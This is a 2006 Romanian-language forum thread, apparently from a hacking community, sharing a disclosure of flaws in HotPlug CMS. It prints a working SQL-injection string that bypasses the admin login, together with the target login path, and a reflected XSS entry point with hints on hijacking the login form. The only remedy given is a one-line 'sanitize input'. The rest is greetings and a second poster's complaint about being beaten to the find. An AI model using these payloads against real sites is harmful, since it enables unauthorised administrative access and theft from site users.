Guest Posted June 25, 2006 Report Posted June 25, 2006 Cei mai Kw3rLN credeai ca numai tu iubesti cms-urile ? ---------------------------------------------------------------------------Package: HotPlug CMS version : latest version---------------------------------------------------------------------------Package Author: Sebastien Rousseau <seb@phoenixfx.com>Home Page [url]http://www.hotplugcms.com/[/url]---------------------------------------------------------------------------Discovered By Sysghost [ Romanian Security Team ]1.ADMIN Bypass SQL injectioncode: query="select * from $this->tablename where email='$u' and password='$w'";exploit: user=1' or 1 LIMIT 0, 1/*   password=passurl : [url]http://[site]/administration/tblcontent/login1.php[/url]Only tested on my localhost using MySQL---------------------------------------------------------------------------2.XSSurl: [url]http://[site]/administration/tblcontent/login1.php?msg=[/url][XSS CODE]Hints to XSS attack:a.a script inject use the void command to modify the action field in the form.b.use css to create a new form on top of the that one using the position attributes.Solution :~~~~~~~~~~SANITIZE INPUT---------------------------------------------------------------------------Shoutz:~~~~~~# Greetz to Kw3rLN, str0ke and the members of Romanian Security Team [ [url]hTTp://Romania.HackTECK.BE[/url] ]---------------------------------------------------------------------------*/I can be found here [url]hTTp://Romania.HackTECK.BE[/url] P.S. hotplug.com e ff vulnerabil da mie lene ca folosesc postgresu.... Quote
Guest Posted June 25, 2006 Report Posted June 25, 2006 a smf tocmai eu mam uitat numai pe milw0rm inainte ... si nu erau exploituri... deabia dupa mi-o venit sa ma uit pe google o mai gasit cineva xss ..... :@ :@ :@ ma impusc .... Quote
